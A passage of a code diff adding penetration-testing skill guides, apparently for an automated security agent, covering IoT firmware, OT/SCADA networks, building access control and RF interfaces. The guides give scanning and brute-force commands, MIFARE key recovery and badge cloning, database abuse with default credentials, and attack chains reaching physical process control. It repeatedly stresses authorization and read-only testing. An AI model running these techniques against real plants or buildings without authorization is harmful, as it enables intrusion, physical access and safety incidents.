+- `strings` hits like `password=` are often default-config placeholders or doc text, not live secrets - validate against the running service.
+- `grype`/`trivy` CVEs on a component that is present but not built-in, not network-reachable, or compiled without the affected feature are not exploitable - prove reachability.
+- A "telnet/UART root shell" requiring physical access or local LAN may be by-design or out of scope per the engagement rules of engagement - classify by access vector, don't inflate.
+- Hardcoded keys/certs that are per-device (derived from serial/MAC) vs shared fleet-wide have very different impact - confirm which before reporting.
+- Emulation crashes from missing nvram/peripherals (FirmAE harness artifacts) are not device vulnerabilities - reproduce on the real target or a faithful emulation.
+
+## Chaining & Impact
+
+- Unsigned OTA + plaintext update URL -> MITM the update -> persistent root implant on every device that auto-updates -> botnet / fleet takeover.
+- Unauth file-read -> dump admin hash / TLS key -> auth bypass -> command injection -> root -> read device->cloud credentials -> vendor API -> tenant-wide account/data access.
+- Default credentials + RTSP/ONVIF -> live camera/audio access and DVR storage exfiltration.
+- UART/JTAG root -> extract fleet-shared symmetric key or signing-bypass -> forge updates or decrypt all OTA traffic for the product line.
+- Command injection on an internet-exposed router/NVR -> pivot to the internal LAN behind it (lateral movement onto otherwise-private hosts).
+- BLE/SoftAP pairing flaw -> hijack onboarding -> attacker-controlled device bound to victim's cloud account.
+
+## Pro Tips
+
+1. When `binwalk` extracts nothing useful, run `unblob` - it handles UBI, oddly-headered, and nested containers binwalk misses. Re-run on every nested archive.
+2. Diff two firmware versions (`vbindiff`, or unpack both and `diff -r`) to find a silently patched bug or a removed backdoor - the delta is your roadmap.
+3. The kernel's device-tree (`.dtb` -> `dtc`) tells you the exact SoC, flash layout, and peripherals before you ever touch silicon - it shortcuts hours of guessing.
+4. Always emulate first (`qemu-*-static` chroot or EMBA/FirmAE). Iterating exploits against a $5 emulated httpd beats bricking the only sample you have.
+5. UART is the fastest root: look for a 4-pin 3.3V header, baud is usually 115200; if you only get U-Boot, interrupt it and append `init=/bin/sh` to bootargs.
+6. Grep the rootfs for the OTA/cloud hostnames in `/etc` and binaries; many devices ship the staging/debug endpoint or an http (not https) update URL.
+7. Reused fleet-wide TLS private keys in the rootfs are gold - one extraction MITMs every device of that model; check certificate CN/serial to confirm it's shared, not per-device.
+8. Anti-rollback is the weak spot even on signed firmware - a properly signed *old* image is still accepted by most loaders; test downgrade before assuming the update path is safe.
+9. Watch CRC vs cryptographic signature - many "checksum failed" rejections are just a CRC32 you can recompute, not a real signature you'd need a key to forge.

--- a/strix/skills/hardware/ot_scada_ics.md
+++ b/strix/skills/hardware/ot_scada_ics.md
@@ -1,0 +1,165 @@
+---
+name: ot_scada_ics
+description: Authorized assessment of OT/SCADA/ICS networks — safe protocol fingerprinting, PLC/HMI/historian enumeration, and impact analysis without disrupting live process.
+---
+
+# OT / SCADA / ICS
+
+Operational Technology networks run physical processes: PLCs (Programmable Logic Controllers), RTUs, HMIs, SCADA masters, historians, and engineering workstations speaking purpose-built protocols (Modbus, S7comm, EtherNet/IP, DNP3, BACnet, OPC UA, EtherCAT, IEC 60870-5-104, IEC 61850/MMS). Most were designed without authentication or encryption and assume a trusted physical perimeter. The attacker objective is to reach the control plane — read/write coils, registers, and ladder logic; manipulate setpoints; or pivot from IT to OT through dual-homed engineering hosts. The dominant risk here is not data theft but **physical harm and process disruption**, so every action must be read-only and rate-limited until impact is explicitly authorized. Treat unsolicited writes, function-code fuzzing, and stop/run commands as out of scope unless a signed test window says otherwise.
+
+## Attack Surface
+
+**Field/control devices**
+- PLCs/RTUs: Modbus/TCP 502, S7comm 102, EtherNet/IP 44818 + 2222, DNP3 20000, BACnet/IP 47808 (0xBAC0), IEC-104 2404, OPC UA 4840/4843, FINS 9600, Niagara Fox 1911/4911, ProConOS 20547
+- HMIs / SCADA masters: web panels (80/443/8080), VNC 5900, RDP 3389, embedded historians
+- Historians: OSIsoft PI 5450, Wonderware, GE Proficy; SQL backends (1433/1521/3306)
+- Engineering workstations (EWS): TIA Portal, RSLogix/Studio 5000, Unity Pro, CODESYS — dual-homed IT/OT bridges
+
+**Management / IT bridge**
+- Industrial switches/firewalls (Hirschmann, Moxa, Stratix) with telnet/SNMP/web
+- Data diodes, OPC/Modbus gateways, protocol converters
+- VPN/jump hosts and remote-access appliances into the OT DMZ (Purdue Level 3.5)
+- Cellular/RTU radios, serial-to-IP terminal servers (Lantronix, Moxa NPort) on 4001+
+
+**Exposure paths**
+- Internet-facing PLCs/HMIs (Shodan/Censys-style discovery)
+- Flat networks with no Purdue segmentation; VLAN hopping into Level 2
+- Default/hardcoded credentials, unauthenticated firmware/config download
+
+## Recon & Enumeration
+
+Install the OT-specific tooling not already in the sandbox:
+
+```bash
+pip install pymodbus pycomm3 cpppo                 # Modbus, EtherNet/IP clients
+pip install python-snap7                           # S7comm (needs libsnap7)
+pip install opcua bacpypes scapy                   # OPC UA, BACnet, raw packet crafting
+git clone https://github.com/digitalbond/Redpoint  # ICS-focused nmap NSE scripts
+nmap --script-updatedb                             # after copying Redpoint .nse to scripts/
+```
+
+**Passive first.** OT recon is fragile; prefer listening to scanning where you have a SPAN/tap:
+
+```bash
+tcpdump -ni eth0 -w ot.pcap 'tcp port 502 or tcp port 102 or udp port 47808 or tcp port 44818'
+# Then identify protocols offline; do NOT replay captured writes.
+```
+
+**Discovery (slow, single-threaded, no aggressive timing):**
+
+```bash
+naabu -host 10.20.0.0/24 -p 102,502,2222,4840,20000,44818,47808,2404,1911,9600 -rate 100 -o ot_ports.txt
+nmap -sT -Pn -n --max-rate 50 --scan-delay 100ms -p 102,502,4840,20000,44818,2404 -iL targets.txt -oA ot_tcp
+```
+
+**Safe protocol fingerprinting** (read-only identity/device-info queries only):
+
+```bash
+# Modbus device identification (FC 43/14) and unit-id sweep — read, never write
+nmap -sT -Pn -p502 --script modbus-discover --script-args='modbus-discover.aggressive=false' <ip>
+# S7comm CPU identity (SZL read, no STOP/RUN)
+nmap -sT -Pn -p102 --script s7-info <ip>
+# EtherNet/IP / CIP identity object
+nmap -sT -Pn -p44818 --script enip-info <ip>
+# BACnet device object + vendor
+nmap -sU -Pn -p47808 --script bacnet-info <ip>
+# Redpoint: DNP3, ProConOS, Niagara Fox, CODESYS, Omron FINS
+nmap -sT -Pn -p20000 --script dnp3-info <ip>
+nmap -sT -Pn -p1911,4911 --script fox-info <ip>
+```
+
+**HMI / web layer** (treat like any web app, but gently):
+
+```bash
+httpx -l ot_web.txt -title -tech-detect -status-code -sc -o ot_http.txt
+nuclei -l ot_web.txt -tags iot,scada,default-login -s critical,high -rl 20 -c 5 -timeout 15 -retries 1 -j -o ot_nuclei.jsonl
+nuclei -l ot_web.txt -t http/exposed-panels/ -rl 20 -c 5 -silent   # HMI/PLC web panels
+ffuf -u https://<hmi>/FUZZ -w /usr/share/wordlists/dirb/common.txt -rate 20 -t 5
+```
+
+**Firmware / config** pulled from EWS shares, TFTP, or device web UI:
+
+```bash
+binwalk -Me firmware.bin
+trufflehog filesystem ./extracted --only-verified     # hardcoded creds/keys in firmware
+gitleaks dir ./extracted                              # config secrets, VPN PSKs
+semgrep --config p/secrets ./project_files            # ladder-logic export, SCADA config dumps
+```
+
+## Methodology
+
+1. **Confirm scope & safety envelope.** Get the device inventory, Purdue level map, and an explicit list of which hosts allow active probing vs. passive-only. Identify safety-instrumented systems (SIS) — these are always passive-only.
+2. **Map segmentation.** From the entry foothold (usually IT or OT-DMZ), enumerate reachable subnets. Verify whether Purdue boundaries (firewalls between Level 3.5/3/2) actually filter, or if it is a flat network.
+3. **Passive collection.** If a tap/SPAN exists, capture and inventory protocols, device IDs, master/slave relationships, and polling intervals before touching anything.
+4. **Targeted discovery.** Slow naabu/nmap sweep of OT ports only, low rate, with scan-delay. Avoid `-sV` version probes against control ports — they send malformed payloads.
+5. **Identity fingerprinting.** Use protocol-native read-only identity queries (Modbus FC43, S7 SZL, CIP Identity, BACnet ReadProperty) to get vendor/model/firmware. Map to known CVEs.
+6. **Auth & access review.** Test default/hardcoded creds on HMIs, switches, EWS, and historians. Check for unauthenticated config/firmware/ladder-logic download.
+7. **Read-only register inventory.** With written authorization, read (never write) holding/input registers and coils to demonstrate exposure of process variables. Stay within polling that matches existing master cadence.
+8. **IT→OT pivot analysis.** Identify dual-homed EWS, jump hosts, and shared credentials that bridge corporate AD into OT (use `nxc smb`, `ldapsearch`, BloodHound on the IT side only).
+9. **Document impact, do not execute it.** Describe what a write/stop/logic-download would achieve; demonstrate the *capability* (reachable port + writable function code accepted on a lab/spare device) rather than acting on production.
+
+## Key Weaknesses / Techniques
+
+**No authentication on control protocols.** Modbus, S7comm (v1/v2), DNP3, EtherNet/IP, and BACnet accept commands from anyone who can route to them. Demonstrate read access only:
+
+```python
+# pymodbus — READ holding registers (FC03). Read-only, single request.
+from pymodbus.client import ModbusTcpClient
+c = ModbusTcpClient("10.20.0.10", port=502, timeout=5)
+c.connect()
+rr = c.read_holding_registers(address=0, count=10, slave=1)
+print(rr.registers)            # process values exposed without auth
+c.close()
+```
+
+**Hardcoded / default credentials.** Siemens/Rockwell/Schneider devices ship with documented defaults; HMIs often keep `admin/admin`, VNC with no password. Verify with the device's own auth, not write commands.
+
+**Unauthenticated firmware & project download.** Many PLCs allow reading the full ladder-logic/project over the protocol or web UI — intellectual property and a blueprint for precise manipulation. Confirm by downloading to file, then analyze offline with `binwalk`/`semgrep`.
+
+**Known CVEs by stack.** Map fingerprint → CVE:
+- Siemens S7-300/400 STOP via crafted S7comm (older firmware)
+- CODESYS pre-auth RCE / directory traversal (CVE-2022-31806 class)
+- Schneider Modicon UMAS auth bypass
+- Niagara/Tridium Fox path traversal & cred disclosure
+Validate version-only via fingerprint; do not fire memory-corruption PoCs at production.
+
+**Replay & lack of integrity.** Most protocols have no message authentication, so a captured legitimate command can be replayed. Note this as a finding from passive capture; do not replay against live process.
+
+**Flat network / no segmentation.** If a Level 3.5 host can reach Modbus 502 on Level 1, that is itself a critical finding — prove reachability with a TCP connect, not a write.
+
+**IT-side exposure.** Internet-facing devices: search engine fingerprints, exposed VPN appliances, EWS reachable from corporate VLAN. Confirm with `httpx`/`nmap` banner only.
+
+## Validation
+
+- **Reachability PoC:** a successful TCP handshake to the control port plus a benign protocol read (device identity / single register) — captured in pcap with timestamps and source/destination.
+- **Identity PoC:** vendor/model/firmware string returned by Modbus FC43, S7 SZL, or CIP Identity object, tied to a specific CVE advisory.
+- **Auth-bypass PoC:** screenshot/log of HMI or config download obtained without credentials.
+- **Segmentation PoC:** connection succeeding *across* a Purdue boundary that policy says should block it; pair with a denied connection from a correctly-segmented source.
+- For each finding record: target IP, port, protocol, exact request bytes, response, timestamp, and confirmation the action was non-mutating. Demonstrate any write/disrupt capability only on a designated lab/spare device, never production.
+
+## False Positives
+
+- **Honeypots/decoys.** Conpot and similar emulate Modbus/S7/SNMP with implausibly uniform banners, every port open, or device IDs that don't match real hardware. Cross-check vendor/firmware consistency and timing.
+- **Gateways masquerading as PLCs.** A Modbus/OPC gateway answers 502 but fronts many downstream slaves; the "device" you fingerprinted may be the converter, not the controller.
+- **Version banners without exploitability.** A CVE-matching firmware string is not proof the patch is absent or the feature is enabled — confirm preconditions.
+- **Open port ≠ writable.** Some devices accept the connection but reject writes via ACL or keyswitch in RUN/PROG position; reachability is the finding, not assumed control.
+- **Stale historian data.** Register values may come from a cache/historian, not the live device.
+
+## Chaining & Impact
+
+- Internet-facing HMI default creds → SCADA master → setpoint visibility across the whole plant.
+- IT phishing → dual-homed EWS → TIA Portal/Studio 5000 → ladder-logic download then (authorized) modified-logic upload = precise, persistent process manipulation.
+- Flat network reachability → unauthenticated Modbus write capability → ability to change coils/registers (setpoints, valve states) → physical process impact / safety event.
+- Firmware secrets (trufflehog) → VPN PSK / shared admin cred → broader OT lateral movement.
+- Engineering project file → exact process model → targeted, deniable manipulation that stays within alarm thresholds.
+
+## Pro Tips
+
+1. Passive beats active every time in OT — a SPAN port and `tcpdump` reveal device IDs, masters, and polling cadence with zero risk.
+2. Never run `nmap -sV`, `-sU` floods, or NSE `*-brute`/aggressive scripts against control ports; version probes send malformed packets that have crashed PLCs.
+3. Match your request rate to the existing master's polling interval — an extra poller at a wildly different cadence can desync watchdogs.
+4. A PLC with its keyswitch in RUN often refuses writes/logic-downloads; note the physical state, it changes the realistic impact.
+5. Identify SIS/safety controllers first and put them strictly out of active scope — disrupting safety logic is the worst possible outcome.
+6. The juiciest target is usually the engineering workstation, not the PLC: it holds projects, credentials, and the IT/OT bridge.
+7. Fingerprint, then map offline to ICS-CERT/vendor advisories; reserve any exploit firing for lab/spare hardware in the test window.
+8. Document the *capability* and reachability; in OT the demonstrated path to impact is the deliverable, not the triggered outage.

--- a/strix/skills/physical/physical_access_control.md
+++ b/strix/skills/physical/physical_access_control.md
@@ -1,0 +1,147 @@
+---
+name: physical_access_control
+description: Assessing badge, lock, and access-control system exposure across controllers, readers, credentials, and their management/network planes.
+---
+
+# Physical Facility / Access Control
+
+Physical Access Control Systems (PACS) tie a building's doors, turnstiles, gates, and elevators to electronic credentials (RFID/NFC badges, PIN pads, mobile credentials, biometrics). The asset is identified by a credential, reader, door controller, or its management software/host. The attacker's objective in an authorized engagement is to assess whether the badge ecosystem, the locks/controllers, and the management and network planes can be made to grant access, disclose credentials, or be tampered with — ideally without ever touching the door, by reaching the IP-side of the system. Treat the door as the last mile: most of the real attack surface is a Windows host, a Linux embedded controller, and a handful of TCP services on the corporate or OT VLAN.
+
+## Attack Surface
+
+**Network / IP plane (primary remote surface)**
+- Door/access controllers: Mercury/LenelS2, HID VertX/Edge, Software House iStar, AMAG, Axis A1001/A1601, ZKTeco, Honeywell Pro-Watch/WIN-PAK, Genetec Synergis, Avigtron/Avigilon ACM.
+- Management servers and web consoles (Lenel OnGuard, Genetec Security Center, Brivo/Verkada cloud, S2 NetBox) over HTTP(S), and thick-client/RPC ports.
+- Protocols: OSDP (RS-485, sometimes IP-bridged), Wiegand (reader↔controller), proprietary TCP, BACnet/Modbus where PACS rides building automation, ONVIF where cameras share the stack.
+- Default management/diagnostic ports: 80/443, 8080/8443, 4070 (Mercury), 9999, 3001, 5432/1433 (backend DB), 22/23, 161 (SNMP).
+
+**Credential / RF plane**
+- 125 kHz low-frequency cards (HID Prox, EM4100, Indala) — no crypto, trivially cloned.
+- 13.56 MHz: MIFARE Classic (broken Crypto1), MIFARE DESFire EV1/EV2/EV3, iCLASS legacy/SE/Seos, NTAG.
+- Mobile credentials (BLE/NFC: HID Mobile Access, Apple/Google Wallet badges), facility codes, PIN pads.
+
+**Physical/console surface (note when in scope)**
+- USB/serial console on controllers, exposed RJ45 behind readers (the reader side of a door is "outside trust"), maintenance/jog buttons, REX (request-to-exit) sensors.
+
+## Recon & Enumeration
+
+Scope the IP plane first — it is the highest-leverage and lowest-risk surface.
+
+```
+# Discover PACS hosts/controllers on the in-scope VLAN
+naabu -host 10.0.0.0/24 -p 22,23,80,161,443,1433,3001,4070,5432,8080,8443,9999 -rate 1000 -o pacs_ports.txt
+nmap -sV -sC -p- --version-intensity 5 -oA pacs_nmap 10.0.20.0/24
+# SNMP often left at 'public' on controllers and PoE switches feeding readers
+nmap -sU -p161 --script snmp-info,snmp-sysdescr 10.0.20.0/24
+onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.0.20.0/24   # apt install onesixtyone
+
+# Fingerprint web management consoles
+httpx -l pacs_ports.txt -title -tech-detect -status-code -favicon -o pacs_http.txt
+# Known PACS exposures, default creds, CVEs
+nuclei -l pacs_http.txt -tags lenel,genetec,hid,zkteco,iot,default-login,exposure -s critical,high,medium -rl 30 -j -o pacs_nuclei.jsonl
+nuclei -l pacs_http.txt -as -s critical,high -rl 30 -c 15 -bs 15 -timeout 10 -silent -o pacs_auto.txt
+
+# Brute hidden admin/diagnostic paths on consoles
+ffuf -u https://CONTROLLER/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,301,401,403 -ac
+katana -u https://CONTROLLER -jc -d 3 -o pacs_endpoints.txt
+
+# Backend DB / management host enumeration (often domain-joined Windows)
+nxc smb 10.0.20.0/24 -u '' -p '' --shares          # netexec; apt install netexec
+nxc mssql CONTROLLER -u sa -p ''                    # OnGuard/WIN-PAK SQL backends
+ldapsearch -x -H ldap://DC -b "dc=corp,dc=local" "(servicePrincipalName=*OnGuard*)"
+```
+
+Credential/RF tooling (when physical RF work is in scope — name the hardware in the report):
+- `proxmark3` (Proxmark3 RDV4) for LF/HF read, clone, sniff, and downgrade attacks.
+- `mfoc` / `mfcuk` (apt install mfoc mfcuk) + `libnfc` for MIFARE Classic key recovery.
+- `flipperzero` for field LF/HF read/emulate; Chameleon Ultra/Mini for HF emulation.
+- `hid-attack`/`OSDP` tooling: `osdp-conformance`, ESPKey/`gecko`-style Wiegand implants for capture (hardware).
+
+## Methodology
+
+1. **Map the deployment** — Identify vendor and product from console banners, favicons, nuclei tags, SNMP sysDescr, and TLS cert CNs. Vendor dictates everything downstream (Mercury panels behave very differently from ZKTeco).
+2. **Enumerate the IP services** — Web consoles, thick-client RPC, embedded SSH/Telnet, the SQL/Postgres backend, SNMP, and any BACnet/Modbus/ONVIF the same hosts speak.
+3. **Attack authentication on the management plane** — Default and shipped credentials, unauthenticated APIs, weak session handling. This is where most full compromises live.
+4. **Assess the controller firmware/config** — Pull firmware or config backups; look for hardcoded keys, plaintext credential databases, and door-relay command endpoints.
+5. **Assess the reader↔controller link** — Wiegand has no authentication; OSDP may be in clear (Secure Channel disabled). Determine whether credentials transit in clear or replayable form.
+6. **Assess the credential** — Identify card tech; for legacy/broken tech, demonstrate read→clone; for facility-code-only systems, demonstrate enumeration.
+7. **Demonstrate door actuation** — If a finding lets you command an unlock or write a valid credential, prove it minimally (logs/relay state), don't fling doors open.
+8. **Chain to the network** — A domain-joined OnGuard server or a flat OT VLAN turns a PACS finding into a corporate-network foothold.
+
+## Key Weaknesses / Techniques
+
+**Default and hardcoded credentials.** PACS ships with well-known logins that survive into production: ZKTeco `admin/admin` and `admin/123456`, S2 NetBox `admin/admin`, many HID/Honeywell web UIs with vendor defaults, SQL `sa` with blank/known passwords on OnGuard/WIN-PAK backends.
+```
+nxc mssql CONTROLLER -u sa -p '' --local-auth
+hydra -L users.txt -P pacs_defaults.txt CONTROLLER http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
+```
+
+**Unauthenticated controller APIs / door command endpoints.** Several controllers expose door state and unlock relays without auth or with trivial auth. ZKTeco devices (CVE-2023-3938..3943) allow auth bypass and command injection; some Mercury/LenelS2 web endpoints expose `/config`, `/cgi-bin/` actions. Verify before invoking any unlock — read state only first.
+```
+curl -sk https://CONTROLLER/api/door/status
+nuclei -u https://CONTROLLER -tags zkteco,cve -s critical,high
+```
+
+**OSDP Secure Channel disabled / Wiegand cleartext.** Wiegand carries the raw card number with zero authentication between reader and controller — a tap (ESPKey-class implant) captures and replays it. OSDP without Secure Channel (SCBK not provisioned, install mode left on) is equally sniffable. Assess whether SCBK is enforced.
+
+**Broken credential cryptography.**
+- 125 kHz Prox/EM4100: just a facility code + card number, no crypto. Read once, clone forever.
+- MIFARE Classic Crypto1 is broken — recover keys offline:
+```
+mfoc -O dump.mfd            # nested attack, needs one known key
+mfcuk -C -R 0:A -s 250 -S 250   # darkside, recovers a key from scratch
+nfc-mfclassic w a clone.mfd dump.mfd   # write recovered dump to a blank
+```
+- iCLASS legacy uses a global shared key; HID Prox/iCLASS legacy are clonable on Proxmark3 (`hf iclass dump`, `lf hid clone`).
+
+**Facility-code / sequential-ID enumeration.** Many sites use one facility code and sequential card numbers. A single captured badge plus a writable card lets you enumerate valid IDs (`lf hid clone -w H10301 --fc <FC> --cn <N>`), demonstrating that any employee badge can be forged from one read.
+
+**Firmware/config disclosure.** Controller firmware and config backups frequently contain plaintext credentials, door schedules, and crypto keys.
+```
+binwalk -e firmware.bin           # apt install binwalk
+trufflehog filesystem ./extracted --only-verified
+gitleaks dir ./extracted -v
+grep -rIaE 'password|SCBK|aes|secret|0x[0-9A-Fa-f]{32}' ./extracted
+```
+
+**Backend database access = master key.** The OnGuard/WIN-PAK/NetBox SQL/Postgres DB holds the credential table, cardholder PII, and door config. Read access lets you enumerate every valid badge; write access lets you provision your own.
+```
+sqlmap -u "https://CONSOLE/report?id=1" --batch --dbs   # if a console param is injectable
+nxc mssql CONTROLLER -u sa -p 'PASS' -q "SELECT TOP 5 * FROM AccessControl.dbo.BADGE"
+```
+
+## Validation
+
+- **Management compromise:** Authenticate with the discovered credential/bypass and read a non-public object (cardholder list count, door inventory). Screenshot/log, don't modify cardholders.
+- **Door actuation:** If a finding commands a relay, prove it on a single in-scope test door and capture the controller audit log entry plus relay/sensor state, then stop. Coordinate timing with the client.
+- **Credential clone:** Read a provided test badge, write it to a blank, and demonstrate the clone reads identically (`lf hid read` / `hf mf dump` before vs after) — validate against a test reader, not a live production door, unless explicitly authorized.
+- **Wiegand/OSDP capture:** Show a captured frame decoding to the same facility code + card number as the source badge.
+- **DB exposure:** Run a `SELECT COUNT(*)` against the credential table to prove read access without exfiltrating PII.
+
+## False Positives
+
+- A reachable web console that enforces unique strong credentials and rejects all defaults — exposure, not a finding.
+- MIFARE DESFire EV2/EV3 and iCLASS Seos with properly provisioned diversified keys: reads return ciphertext you cannot recover; do not report as clonable.
+- OSDP with Secure Channel enabled (SCBK provisioned) — sniffed traffic is encrypted; replay fails.
+- "Open" relay endpoints that are actually behind a reverse proxy requiring mutual TLS or a VLAN you only reached because the engagement put you on the OT segment (note the prerequisite).
+- SNMP `public` that exposes only generic interface stats with no PACS data or write community.
+- A demo/test controller on the bench VLAN mistaken for production — confirm asset ownership.
+
+## Chaining & Impact
+
+- Default web login → controller config → SCBK/credential keys → clone any badge → physical entry to restricted areas.
+- Unauthenticated door API → relay unlock → tailgate-free entry; combined with disabled-camera ONVIF on the same host, no visual record.
+- SQL `sa` on OnGuard backend → provision a valid cardholder + badge for yourself → persistent authorized-looking access; same DB host is usually domain-joined → `nxc`/secretsdump → corporate AD foothold.
+- MIFARE Classic key recovery → master-key reuse across all doors → site-wide cloning.
+- Flat OT/PACS VLAN → BACnet/Modbus on shared controllers → HVAC/elevator influence; PACS host as a pivot into the camera (ONVIF/RTSP) and building-automation networks.
+
+## Pro Tips
+
+1. Start on the wire, not at the door — the management server (often a neglected, domain-joined Windows box) is usually the fastest full compromise and the safest to test.
+2. Vendor-fingerprint early: favicon hash, TLS cert CN, and SNMP sysDescr identify Lenel/Genetec/ZKTeco/HID instantly and select the right CVE/default-cred set.
+3. Card tech tells you the effort: LF Prox/EM and MIFARE Classic are clone-in-minutes; DESFire EV2+/Seos with diversified keys are not — don't waste cycles, report the strong ones as adequate.
+4. "Read mode" first on every controller API — query door/relay state before any command; never issue an unlock without confirming the specific test door and client sign-off.
+5. Wiegand is the system's soft underbelly: the reader side of any door is untrusted territory, and an inline tap defeats even an otherwise-hardened backend.
+6. Check whether OSDP is running in install/learn mode — many integrators leave SCBK unprovisioned, leaving "secure" OSDP effectively cleartext.
+7. The credential database is the crown jewel; read-only proof (counts, schema) is sufficient impact — avoid pulling cardholder PII.
+8. Correlate every actuation test with the controller's own audit log so the client can verify your activity and you can prove the finding cleanly.

--- a/strix/skills/physical/rf_interface.md
+++ b/strix/skills/physical/rf_interface.md
@@ -1,0 +1,182 @@
+---
+name: rf_interface
+description: Assessing satellite, radio, and RF interfaces — signal capture, protocol decoding, link-layer abuse, and management-plane exposure
+---
+
+# Satellite / Radio / RF Interface
+
+An "RF interface" asset is any system whose primary or auxiliary trust boundary is a radio link: satellite ground terminals (VSAT, Inmarsat, Starlink-class user terminals), LoRa/LoRaWAN gateways, ISM-band telemetry (433/868/915 MHz), Zigbee/Z-Wave/Thread controllers, BLE/Wi-Fi co-processors, GNSS receivers, ADS-B/AIS receivers, and the SDR or modem hardware feeding them. The asset identifier may be a frequency, a NORAD/satellite ID, a device callsign/EUI, a gateway IP, or a modem model. The attacker's objective is to assess the full path: the over-the-air protocol (capture, decode, replay, inject, spoof), the link/session security (keys, auth, freshness), and — critically — the management plane (the web UI, SSH, SNMP, proprietary TCP control port, or cloud backhaul) that almost always sits behind the radio and is the fastest route to durable impact. Treat the RF side and the IP/management side as one continuous attack surface.
+
+## Attack Surface
+
+**Over-the-air (physical/link layer)**
+- Uplink/downlink RF carriers — modulation (FSK/GFSK/LoRa CSS/PSK/QAM), framing, FEC, scrambling
+- Beacon/broadcast frames (GNSS nav messages, ADS-B, AIS, LoRaWAN join/beacon)
+- Join/pairing/association exchanges (LoRaWAN OTAA join, Zigbee Trust Center, BLE pairing)
+- Unauthenticated or replayable command/telemetry frames
+
+**Management & control plane (the high-value target)**
+- Web admin UI on the terminal/gateway/modem (HTTP/HTTPS, often :80/:443/:8080/:8443)
+- SSH/Telnet (often vendor default creds), SNMP (v1/v2c community strings)
+- Proprietary TCP/UDP control ports (e.g. modem NMS, satellite terminal "console" sockets)
+- Debug/diagnostic interfaces: UART/JTAG headers, USB serial, AT command channels
+- Cloud/NMS backhaul: MQTT, REST APIs, LoRaWAN Network Server, vendor SaaS
+
+**Firmware & supply chain**
+- OTA firmware update channel (signed? encrypted? rollback-protected?)
+- Extractable firmware images (web download, flash dump, vendor portal)
+- Hardcoded keys, default LoRaWAN AppKeys, GNSS/SDR driver blobs
+
+## Recon & Enumeration
+
+Most engagements split into an RF-capture track and a management-plane track. Run both.
+
+**Management plane — network discovery (do this first; fastest impact):**
+```
+naabu -host 192.0.2.10 -top-ports 1000 -o ports.txt
+nmap -sV -sC -p- -T4 --version-all 192.0.2.10 -oA rf_mgmt
+# Satellite/modem/SDR control ports worth probing explicitly:
+nmap -sV -p 22,23,80,161,443,1883,4533,5760,8080,8443,8080,9000,30000 192.0.2.10
+httpx -l hosts.txt -title -tech-detect -status-code -ports 80,443,8080,8443 -o httpx.txt
+nuclei -u https://192.0.2.10 -as -s critical,high -rl 30 -c 10 -timeout 10 -j -o nuclei.jsonl
+wafw00f https://192.0.2.10
+```
+
+**SNMP / management protocols (extremely common on terminals & gateways):**
+```
+nmap -sU -p 161 --script snmp-info,snmp-sysdescr 192.0.2.10
+onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.0.2.10
+snmpwalk -v2c -c public 192.0.2.10 .1.3.6.1.2.1   # walk MIB-2; vendor MIBs hold config/keys
+```
+
+**Web UI content discovery & auth:**
+```
+ffuf -u https://192.0.2.10/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc all -fc 404
+katana -u https://192.0.2.10 -jc -d 3 -o crawl.txt
+jwt_tool <token>            # if the UI/API issues JWTs
+```
+
+**RF capture & decode (install SDR toolchain as needed):**
+```
+apt-get install -y rtl-sdr gqrx-sdr gnuradio multimon-ng rtl-433 dump1090-mutability
+pip install urh                              # Universal Radio Hacker (GUI + headless)
+# Survey the band for activity, find the carrier:
+rtl_power -f 400M:1G:1M -g 40 -i 10 sweep.csv
+# Generic ISM/telemetry decode (huge protocol library, great first pass):
+rtl_433 -A -f 433.92M                        # -A = analyze/guess modulation
+# ADS-B (aircraft) / dump for any 1090 MHz receiver under test:
+dump1090 --interactive --net
+# Pager/POCSAG/FLEX & misc digital modes:
+rtl_fm -f 152.0M -s 22050 | multimon-ng -t raw -a POCSAG1200 -
+```
+
+**LoRa / LoRaWAN, GNSS, satellite specifics (install as needed):**
+```
+pip install LoRaWAN                           # frame parsing/MIC checks
+# inspect IQ captures visually:
+apt-get install -y inspectrum
+# GNSS spoofing/sim research (authorized lab only):
+git clone https://github.com/osqzss/gps-sdr-sim && cd gps-sdr-sim && make
+```
+
+**Firmware (if an image is obtainable):**
+```
+binwalk -e firmware.bin                       # carve filesystems/bootloaders
+syft dir:_firmware.bin.extracted -o table     # SBOM of extracted rootfs
+grype dir:_firmware.bin.extracted             # known-vuln components
+trufflehog filesystem _firmware.bin.extracted # hardcoded keys/creds
+gitleaks dir _firmware.bin.extracted
+semgrep --config auto _firmware.bin.extracted/squashfs-root
+trivy fs _firmware.bin.extracted
+```
+
+## Methodology
+
+1. **Confirm scope & RF authorization.** Transmitting on most bands is regulated. Confirm written authorization, the exact frequencies/devices in scope, and whether active TX (replay/injection/spoofing) is permitted or capture-only. Default to capture-only until injection is explicitly approved.
+2. **Map the asset.** Identify the device model, the radio standard(s), and every IP-reachable surface. Run the management-plane discovery (`naabu`/`nmap`/`httpx`) immediately — the web/SSH/SNMP plane is usually the path of least resistance.
+3. **Triage the management plane.** Default creds, exposed SNMP, outdated firmware CVEs (`nuclei -as`), unauthenticated admin endpoints, JWT/session weaknesses. A satellite terminal with `admin/admin` on :8080 is a full compromise without ever touching RF.
+4. **Survey the spectrum.** `rtl_power` sweep to locate the active carrier; identify center frequency, bandwidth, and bursting pattern.
+5. **Capture IQ & demodulate.** Record at the carrier, view in `inspectrum`/URH, identify modulation, symbol rate, sync word, framing, and FEC.
+6. **Decode the protocol.** Use `rtl_433`/`multimon-ng`/URH protocol library or hand-roll a demod chain. Recover frame structure: preamble, address/EUI, sequence/counter, payload, CRC/MIC.
+7. **Assess link security.** Is the frame authenticated (MIC/HMAC)? Encrypted? Does it carry a freshness counter (frame counter / nonce)? Are join/pairing exchanges protected?
+8. **Test replay & injection (if authorized).** Re-transmit a captured frame; observe whether the receiver acts on it. Then test crafted/modified frames.
+9. **Test spoofing & desync** of broadcast/beacon protocols (GNSS, ADS-B, AIS) in an isolated/shielded environment only.
+10. **Pivot RF → IP and IP → RF.** Use management-plane access to dump radio keys/config; use recovered RF keys to authenticate to the network server/cloud.
+11. **Firmware analysis** of any obtainable image for hardcoded keys, the OTA mechanism, and shared/global secrets.
+12. **Validate, document, stop at proof.** PoC with minimal-impact evidence; never disrupt a live satellite/aviation/maritime service.
+
+## Key Weaknesses / Techniques
+
